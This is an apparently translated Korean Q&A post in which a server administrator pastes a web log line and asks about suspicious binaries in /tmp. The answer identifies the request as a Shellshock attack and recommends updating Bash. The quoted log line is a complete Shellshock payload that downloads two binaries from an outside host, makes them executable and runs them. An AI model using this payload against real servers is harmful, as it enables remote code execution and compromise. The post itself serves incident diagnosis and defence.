우리는 바이너리를 발견 /tmp/susu1하고 /tmp/susu2웹 서버 사용자에 의해 실행되었습니다.
로그에는 다음 항목이 있습니다.
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
그러나 우리는 그러한 요청 중 오류 코드 301, 302, 403, 404, 500만 발견했습니다. 해킹이 성공했음을 나타내는 200er 코드가 없습니다.
이것이 일반적인 보안 문제입니까? 어떻게 고칠 수 있나요? 아니면 어떻게 더 추적할 수 있나요?
답변1
이것은 쉘쇼크 공격처럼 보이며, bash가 이 버그에 대한 수정 사항을 릴리스한 2014년 9월 24일에 처음 발표되었습니다.
첫 번째 버그는 명령이 환경 변수 값에 저장된 함수 정의의 끝에 연결될 때 Bash가 의도하지 않게 명령을 실행하도록 만듭니다.1[6] 이 내용이 게시된 지 며칠 만에 기본 설계 결함에 대한 철저한 조사를 통해 다양한 관련 취약점이 발견되었습니다(CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, 및 CVE-2014-7187); Ramey는 일련의 추가 패치를 통해 이를 해결했습니다.
다음에 설명된 대로 시스템이 취약한지 확인할 수 있습니다.내 서버가 ShellShock 버그에 취약한지 테스트하는 방법은 무엇입니까?
문제를 해결하려면 시스템을 업데이트하거나 최소한 Bash 버전을 업데이트해야 합니다.